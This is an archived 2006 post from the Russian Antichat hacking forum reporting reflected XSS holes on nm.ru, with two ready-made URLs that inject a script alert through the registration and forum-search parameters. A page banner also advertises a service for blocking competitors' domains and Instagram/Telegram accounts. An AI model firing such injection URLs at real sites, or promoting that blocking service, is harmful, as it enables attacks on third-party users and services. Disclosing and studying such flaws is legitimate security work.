Форум АНТИЧАТ - XSS на NM.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS на NM.ru

Опции темы

Поиск в этой теме

Опции просмотра

XSS на NM.ru

26.04.2006, 21:31

Go0o$E

Members of Antichat - Level 5

Регистрация: 27.01.2006

Сообщений: 258

Провел на форуме:
6127131

Репутация: 774

XSS на NM.ru

Не фильтруются: login, quest, answ.

Код:

_http://www.nm.ru/users/reg.dhtml?__post=1&login="><script>alert('XSS')%3B</script>&domain=newmail%2Eru&passwd=1&pass2=1&quest_helper=%C4%E0%F2%E0%20%F0%EE%E6%E4%E5%ED%E8%FF%20%C2%E0%F8%E5%E9%20%E1%E0%E1%F3%F8%EA%E8%3F&quest=1&answ=1

Не фильтруются: search, session_id.
И

Код:

_http://www.nm.ru/users/help/forum.dhtml?search="><script>alert('XSS')%3B</script>&session_id=1&fid=2.

__________________

Завтра будет.Лучше.

Последний раз редактировалось kot777; 27.04.2006 в 21:34.. Причина: добавил CODE чтобы не разъежались поля

27.04.2006, 21:43